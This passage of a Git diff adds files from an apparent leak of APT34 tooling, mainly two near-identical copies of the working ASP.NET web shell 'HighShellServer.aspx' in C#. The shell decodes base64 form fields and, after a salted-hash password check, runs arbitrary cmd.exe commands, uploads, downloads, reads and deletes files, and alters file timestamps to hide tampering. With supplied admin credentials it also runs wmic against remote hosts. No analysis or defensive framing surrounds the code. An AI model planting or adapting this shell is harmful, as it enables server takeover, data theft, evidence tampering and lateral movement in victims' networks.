string createJsonDirectory(System.IO.DirectoryInfo[] dir){
string json="\"dir\":[";
for (int i=0;i<dir.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"mdate\":\"{1}\"}}",dir[i].Name,dir[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string createJsonFile(System.IO.FileInfo[] file){
string json="\"file\":[";
for (int i=0;i<file.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"size\":\"{1}\",\"mdate\":\"{2}\"}}",file[i].Name,sizeFix(file[i].Length),file[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string sizeFix(long size){double s=size;if(s<1024)return s+" B";s=s/1024;if(s<1024)return Math.Round(s,2)+" KB";s=s/1024;if(s<1024)return Math.Round(s,2)+" MB";s=s/1024;if(s<1024)return Math.Round(s,2)+" GB";s=s/1024;return Math.Round(s,2)+" TB";}
void response(string res){Response.Clear();Response.Write(tb(res));Response.Flush();Response.SuppressContent=true;ApplicationInstance.CompleteRequest();}
void changeTime(string timeh,string tfil,string ttar,string ttim){string ret="Error : -";try {if(!string.IsNullOrEmpty(tfil)){if(timeh=="1")ret=ti(tfil);else if(timeh=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}else if(timeh=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}}}catch(Exception e){ret="Error : "+e.Message;}response(ret);}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
</script>

282
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special1/HighShellServer.aspx Normal file
View File

@@ -0,0 +1,282 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%
try
{
NameValueCollection t=HttpContext.Current.Request.Form;
method selectedMethod=method.auth;
try{int methodID=int.Parse(fb(t["m"]));selectedMethod=(method)methodID;}catch{rm();}
p=fb(t["p"]);
adminU=fb(t["adminU"]);
adminP=fb(t["adminP"]);
if(string.IsNullOrEmpty(p)){if(HttpContext.Current.Request.Cookies["p"] != null)p=fb(HttpContext.Current.Request.Cookies["p"].Value);}
if(selectedMethod != method.auth && selectedMethod != method.authAjax && !login(p)){rm();}
switch(selectedMethod){
case method.auth:
case method.authAjax:auth(p);break;
case method.command:
case method.commandAjax:command(fb(t["cmd"]));break;
case method.upload:upload(HttpContext.Current.Request.Files["uploadFile"],fb(t["uploadPath"]));break;
case method.download:download(fb(t["don"]),fb(t["isdel"]));break;
case method.downloadTest:downloadTest(fb(t["don"]));break;
case method.explorer:exp(fb(t["exadd"]));break;
case method.getsize:gsize(fb(t["gsize"]));break;
case method.getlocation:
case method.getlocationAjax:response(getLoc());break;
case method.rename:rename(fb(t["rename1"]),fb(t["rename2"]));break;
case method.copy:copy(fb(t["copy1"]),fb(t["copy2"]));break;
case method.view:view(fb(t["view"]));break;
case method.delete:delete(fb(t["delete"]));break;
case method.multiDelete:multiDelete(fb(t["delete"]));break;
case method.changeTime:changeTime(fb(t["timeh"]),fb(t["tfil"]),fb(t["ttar"]),fb(t["ttim"]));break;
default:break;
}
}
catch(Exception ex){response("Error : "+ex.Message);}
%>
<script runat="server">
enum method{auth=0,command=1,upload=2,uploadbase64=3,delete=4,download=5,changeTime=6,sqlQuery=7,explorer=8,getsize=9,getlocation=10,rename=11,copy=12,view=13,commandAjax=14,downloadTest=15,checkModules=16,installModule=17,uninstallModule=18,cmd7z=19,authAjax=20,getlocationAjax=21,multiDelete=24};
string salt="(FN3KGAh!FzN@DgixY4Lh3Hutm$OYR%Ono)47TWOZaak!QcpSZ!uEM#p1tthN6mc";
string p,adminU,adminP;
bool aut=false;
string pp="r8EeoyCdkSJkcBHUvH3BzrzsSFfhcP/Ks7Su+asIoqU=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void rm(){Response.Redirect(Request.Url.AbsolutePath.Substring(0,Request.Url.AbsolutePath.LastIndexOf("/")+1)+" "+Request.Url.AbsolutePath.Substring(Request.Url.AbsolutePath.LastIndexOf("/")+1));}
void auth(string p){
string ret=string.Empty;
try {
ret = string.Format("{{\"auth\":\"{0}\",\"loc\":\"{1}\"}}", login(p).ToString(),tb(getLoc()));
} catch(Exception e){
ret ="Error : "+e.Message;
}
response(ret);
}
bool login(string p){bool aut=false;try{if(!string.IsNullOrEmpty(p)){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p+salt)))==pp;}}catch(Exception e){response(e.Message);}return aut;}
void command(string cmd){string ret="Error : -";try{string o=exec(cmd);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine)+2);ret=HttpUtility.HtmlEncode(o);}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
string getLoc(){return Server.MapPath(string.Empty)+"\\";}
void downloadTest(string don)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(don))
{
using (System.IO.Stream stream = new System.IO.FileStream(don, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", don);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
void download(string don, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(don)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(don).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(don))));
response.WriteFile(don);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}
string exec(string cmd,string pro=""){System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();return o;}
void gsize(string addr){string ret="Error : -";try{hasErrorInGetSize=false;long size=GetDirSize(new System.IO.DirectoryInfo(addr));ret=sizeFix(size);if(hasErrorInGetSize && sizelvl==0)ret=sizeError;else if(hasErrorInGetSize)ret="!"+ret;}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void view(string path){string ret="You are viewing the contents of this file : "+path+Environment.NewLine;try{ret+=System.IO.File.ReadAllText(path);}catch(Exception ex){ret="Error : "+ex.Message;}response(HttpUtility.HtmlEncode(ret));}
void delete(string path){
string ret="Error : -";
try {
System.IO.File.Delete(path);
ret =string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly deleted{1}",path,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(path))));
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void multiDelete(string files)
{
string ret="Error : -";
try{
string[] f = files.Split('|');
ret = string.Format("All '{0}' files successfuly deleted.", f.Length);
foreach (string item in f)
{
System.IO.File.Delete(fb(item));
}
}catch (Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void rename(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Move(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly moved to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void copy(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Copy(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly copied to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
string getDirectoryInfo(string address)
{
string ret="Error : -";
try {
if (address.ToLower()=="root"){
ret ="{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";
string netUse=exec("net use");
string[] lines=netUse.Split(new string[]{Environment.NewLine },StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines){
if (item.ToLower().StartsWith("ok")){
int index=item.IndexOf("\\\\");
ret +=",{\"name\":\"\\\\"+item.Substring(index,item.IndexOf('\\',index+2)-index)+"\"}";
}
}
ret +="]}";
} else{
if (address.StartsWith("\\\\")&& address.Trim('\\').Split('\\').Count()==1){
string tmp=address.ToLower().TrimEnd('\\');
if (tmp=="\\\\localhost"){
ret ="{\"dir\":[";
bool isStart=false;
foreach (System.IO.DriveInfo item in System.IO.DriveInfo.GetDrives()){
if (item.IsReady){
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",item.Name.TrimEnd('\\').TrimEnd(':')+"$",item.TotalSize,item.TotalFreeSpace,"["+sizeFix(item.TotalFreeSpace)+"] free of ["+sizeFix(item.TotalSize)+"]",item.DriveFormat,item.DriveType);
isStart =true;
}
}
ret +="]}";
} else{
if (!string.IsNullOrEmpty(adminU)&& !string.IsNullOrEmpty(adminP)){
string strWC=@"wmic /node:{0} /user:{1} /password:{2} process call create ""cmd.exe /c > c:\windows\temp\KMSHFX0023{3}.tmp 2>&1 wmic logicaldisk get {4}"" 2>&1";
string strWF=@"\\{0}\c$\windows\temp\KMSHFX0023{1}.tmp";
string strWD=@"del {0} 2>&1";
tmp =tmp.TrimStart('\\');
exec(string.Format(strWC,tmp,adminU,adminP,1,"Caption"));
exec(string.Format(strWC,tmp,adminU,adminP,2,"FileSystem"));
exec(string.Format(strWC,tmp,adminU,adminP,3,"Size"));
exec(string.Format(strWC,tmp,adminU,adminP,4,"FreeSpace"));
exec(string.Format(strWC,tmp,adminU,adminP,5,"Description"));
System.Threading.Thread.Sleep(3000);
List<string> diskTemp=new List<string>();
for (int i=1;i <= 5;i++){
string f=string.Format(strWF,tmp,i);
string[] lDisk=System.IO.File.ReadAllLines(f);
exec(string.Format(strWD,f));
for (int j=1;j<lDisk.Length;j++){
if (i==1)diskTemp.Add(lDisk[j]);
else diskTemp[j-1]+="|"+lDisk[j];
}
}
ret ="{\"dir\":[";
bool isStart=false;
foreach (string item in diskTemp){
string[] diskInfo=item.Split('|');
long TotalSize=0;
long TotalFreeSpace=0;
long.TryParse(diskInfo[2],out TotalSize);
long.TryParse(diskInfo[3],out TotalFreeSpace);
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",diskInfo[0].TrimEnd('\\').TrimEnd(' ').TrimEnd(':')+"$",TotalSize,TotalFreeSpace,"["+sizeFix(TotalFreeSpace)+"] free of ["+sizeFix(TotalSize)+"]",diskInfo[1],diskInfo[4]);
isStart =true;
}
ret +="]}";
} else
ret ="Error : Admin Username or Password is empty";
}
} else{
System.IO.FileAttributes attr=System.IO.File.GetAttributes(address);
if ((attr & System.IO.FileAttributes.Directory)==System.IO.FileAttributes.Directory){
System.IO.DirectoryInfo dirInfo=new System.IO.DirectoryInfo(address);
ret ="{"+string.Format("{0},{1}",createJsonDirectory(dirInfo.GetDirectories()),createJsonFile(dirInfo.GetFiles()))+"}";
}
}
}
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
return ret;
}
void exp(string exadd){string ret="Error : -";ret=getDirectoryInfo(exadd);response(ret);}
bool hasErrorInGetSize=false;
int sizelvl=0;
string sizeError;
long GetDirSize(System.IO.DirectoryInfo d){long size=0;try{System.IO.FileInfo[] fis=d.GetFiles();foreach(System.IO.FileInfo fi in fis){size+=fi.Length;}sizelvl++;System.IO.DirectoryInfo[] dis=d.GetDirectories();foreach(System.IO.DirectoryInfo di in dis){size+=GetDirSize(di);}}catch(UnauthorizedAccessException ex){sizeError="Error : "+ex.Message;hasErrorInGetSize=true;}return size;}
string createJsonDirectory(System.IO.DirectoryInfo[] dir){
string json="\"dir\":[";
for (int i=0;i<dir.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"mdate\":\"{1}\"}}",dir[i].Name,dir[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string createJsonFile(System.IO.FileInfo[] file){
string json="\"file\":[";
for (int i=0;i<file.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"size\":\"{1}\",\"mdate\":\"{2}\"}}",file[i].Name,sizeFix(file[i].Length),file[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string sizeFix(long size){double s=size;if(s<1024)return s+" B";s=s/1024;if(s<1024)return Math.Round(s,2)+" KB";s=s/1024;if(s<1024)return Math.Round(s,2)+" MB";s=s/1024;if(s<1024)return Math.Round(s,2)+" GB";s=s/1024;return Math.Round(s,2)+" TB";}
void response(string res){Response.Clear();Response.Write(tb(res));Response.Flush();Response.SuppressContent=true;ApplicationInstance.CompleteRequest();}
void changeTime(string timeh,string tfil,string ttar,string ttim){string ret="Error : -";try {if(!string.IsNullOrEmpty(tfil)){if(timeh=="1")ret=ti(tfil);else if(timeh=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}else if(timeh=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}}}catch(Exception e){ret="Error : "+e.Message;}response(ret);}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
</script>

1739
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special2/HighShellLocal/HighShellLocal.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

282
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special2/HighShellServer.aspx Normal file
View File

@@ -0,0 +1,282 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%
try
{
NameValueCollection t=HttpContext.Current.Request.Form;
method selectedMethod=method.auth;
try{int methodID=int.Parse(fb(t["m"]));selectedMethod=(method)methodID;}catch{rm();}
p=fb(t["p"]);
adminU=fb(t["adminU"]);
adminP=fb(t["adminP"]);
if(string.IsNullOrEmpty(p)){if(HttpContext.Current.Request.Cookies["p"] != null)p=fb(HttpContext.Current.Request.Cookies["p"].Value);}
if(selectedMethod != method.auth && selectedMethod != method.authAjax && !login(p)){rm();}
switch(selectedMethod){
case method.auth:
case method.authAjax:auth(p);break;
case method.command:
case method.commandAjax:command(fb(t["cmd"]));break;
case method.upload:upload(HttpContext.Current.Request.Files["uploadFile"],fb(t["uploadPath"]));break;
case method.download:download(fb(t["don"]),fb(t["isdel"]));break;
case method.downloadTest:downloadTest(fb(t["don"]));break;
case method.explorer:exp(fb(t["exadd"]));break;
case method.getsize:gsize(fb(t["gsize"]));break;
case method.getlocation:
case method.getlocationAjax:response(getLoc());break;
case method.rename:rename(fb(t["rename1"]),fb(t["rename2"]));break;
case method.copy:copy(fb(t["copy1"]),fb(t["copy2"]));break;
case method.view:view(fb(t["view"]));break;
case method.delete:delete(fb(t["delete"]));break;
case method.multiDelete:multiDelete(fb(t["delete"]));break;
case method.changeTime:changeTime(fb(t["timeh"]),fb(t["tfil"]),fb(t["ttar"]),fb(t["ttim"]));break;
default:break;
}
}
catch(Exception ex){response("Error : "+ex.Message);}
%>
<script runat="server">
enum method{auth=0,command=1,upload=2,uploadbase64=3,delete=4,download=5,changeTime=6,sqlQuery=7,explorer=8,getsize=9,getlocation=10,rename=11,copy=12,view=13,commandAjax=14,downloadTest=15,checkModules=16,installModule=17,uninstallModule=18,cmd7z=19,authAjax=20,getlocationAjax=21,multiDelete=24};
string salt="I9DRj5CH6Rtzd3HTCUbtJlmWNzsTa8b*2ldX3RT7ZOof(Zl$CaPQ3rpsGK74NMH1z";
string p,adminU,adminP;
bool aut=false;
string pp="TMzp5OlYv7Q0MSosaDqT5zRztTho/9/Ln7iayTV46VE=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void rm(){Response.Redirect(Request.Url.AbsolutePath.Substring(0,Request.Url.AbsolutePath.LastIndexOf("/")+1)+" "+Request.Url.AbsolutePath.Substring(Request.Url.AbsolutePath.LastIndexOf("/")+1));}
void auth(string p){
string ret=string.Empty;
try {
ret = string.Format("{{\"auth\":\"{0}\",\"loc\":\"{1}\"}}", login(p).ToString(),tb(getLoc()));
} catch(Exception e){
ret ="Error : "+e.Message;
}
response(ret);
}
bool login(string p){bool aut=false;try{if(!string.IsNullOrEmpty(p)){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p+salt)))==pp;}}catch(Exception e){response(e.Message);}return aut;}
void command(string cmd){string ret="Error : -";try{string o=exec(cmd);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine)+2);ret=HttpUtility.HtmlEncode(o);}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
string getLoc(){return Server.MapPath(string.Empty)+"\\";}
void downloadTest(string don)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(don))
{
using (System.IO.Stream stream = new System.IO.FileStream(don, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", don);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
void download(string don, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(don)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(don).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(don))));
response.WriteFile(don);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}
string exec(string cmd,string pro=""){System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();return o;}
void gsize(string addr){string ret="Error : -";try{hasErrorInGetSize=false;long size=GetDirSize(new System.IO.DirectoryInfo(addr));ret=sizeFix(size);if(hasErrorInGetSize && sizelvl==0)ret=sizeError;else if(hasErrorInGetSize)ret="!"+ret;}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void view(string path){string ret="You are viewing the contents of this file : "+path+Environment.NewLine;try{ret+=System.IO.File.ReadAllText(path);}catch(Exception ex){ret="Error : "+ex.Message;}response(HttpUtility.HtmlEncode(ret));}
void delete(string path){
string ret="Error : -";
try {
System.IO.File.Delete(path);
ret =string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly deleted{1}",path,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(path))));
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void multiDelete(string files)
{
string ret="Error : -";
try{
string[] f = files.Split('|');
ret = string.Format("All '{0}' files successfuly deleted.", f.Length);
foreach (string item in f)
{
System.IO.File.Delete(fb(item));
}
}catch (Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void rename(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Move(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly moved to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void copy(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Copy(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly copied to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
string getDirectoryInfo(string address)
{
string ret="Error : -";
try {
if (address.ToLower()=="root"){
ret ="{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";
string netUse=exec("net use");
string[] lines=netUse.Split(new string[]{Environment.NewLine },StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines){
if (item.ToLower().StartsWith("ok")){
int index=item.IndexOf("\\\\");
ret +=",{\"name\":\"\\\\"+item.Substring(index,item.IndexOf('\\',index+2)-index)+"\"}";
}
}
ret +="]}";
} else{
if (address.StartsWith("\\\\")&& address.Trim('\\').Split('\\').Count()==1){
string tmp=address.ToLower().TrimEnd('\\');
if (tmp=="\\\\localhost"){
ret ="{\"dir\":[";
bool isStart=false;
foreach (System.IO.DriveInfo item in System.IO.DriveInfo.GetDrives()){
if (item.IsReady){
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",item.Name.TrimEnd('\\').TrimEnd(':')+"$",item.TotalSize,item.TotalFreeSpace,"["+sizeFix(item.TotalFreeSpace)+"] free of ["+sizeFix(item.TotalSize)+"]",item.DriveFormat,item.DriveType);
isStart =true;
}
}
ret +="]}";
} else{
if (!string.IsNullOrEmpty(adminU)&& !string.IsNullOrEmpty(adminP)){
string strWC=@"wmic /node:{0} /user:{1} /password:{2} process call create ""cmd.exe /c > c:\windows\temp\KMSHFX0023{3}.tmp 2>&1 wmic logicaldisk get {4}"" 2>&1";
string strWF=@"\\{0}\c$\windows\temp\KMSHFX0023{1}.tmp";
string strWD=@"del {0} 2>&1";
tmp =tmp.TrimStart('\\');
exec(string.Format(strWC,tmp,adminU,adminP,1,"Caption"));
exec(string.Format(strWC,tmp,adminU,adminP,2,"FileSystem"));
exec(string.Format(strWC,tmp,adminU,adminP,3,"Size"));
exec(string.Format(strWC,tmp,adminU,adminP,4,"FreeSpace"));
exec(string.Format(strWC,tmp,adminU,adminP,5,"Description"));
System.Threading.Thread.Sleep(3000);
List<string> diskTemp=new List<string>();
for (int i=1;i <= 5;i++){
string f=string.Format(strWF,tmp,i);
string[] lDisk=System.IO.File.ReadAllLines(f);
exec(string.Format(strWD,f));
for (int j=1;j<lDisk.Length;j++){
if (i==1)diskTemp.Add(lDisk[j]);
else diskTemp[j-1]+="|"+lDisk[j];
}
}
ret ="{\"dir\":[";
bool isStart=false;
foreach (string item in diskTemp){
string[] diskInfo=item.Split('|');
long TotalSize=0;
long TotalFreeSpace=0;
long.TryParse(diskInfo[2],out TotalSize);
long.TryParse(diskInfo[3],out TotalFreeSpace);
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",diskInfo[0].TrimEnd('\\').TrimEnd(' ').TrimEnd(':')+"$",TotalSize,TotalFreeSpace,"["+sizeFix(TotalFreeSpace)+"] free of ["+sizeFix(TotalSize)+"]",diskInfo[1],diskInfo[4]);
isStart =true;
}
ret +="]}";
} else
ret ="Error : Admin Username or Password is empty";
}
} else{
System.IO.FileAttributes attr=System.IO.File.GetAttributes(address);
if ((attr & System.IO.FileAttributes.Directory)==System.IO.FileAttributes.Directory){
System.IO.DirectoryInfo dirInfo=new System.IO.DirectoryInfo(address);
ret ="{"+string.Format("{0},{1}",createJsonDirectory(dirInfo.GetDirectories()),createJsonFile(dirInfo.GetFiles()))+"}";
}
}
}
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
return ret;
}
void exp(string exadd){string ret="Error : -";ret=getDirectoryInfo(exadd);response(ret);}
bool hasErrorInGetSize=false;
int sizelvl=0;
string sizeError;
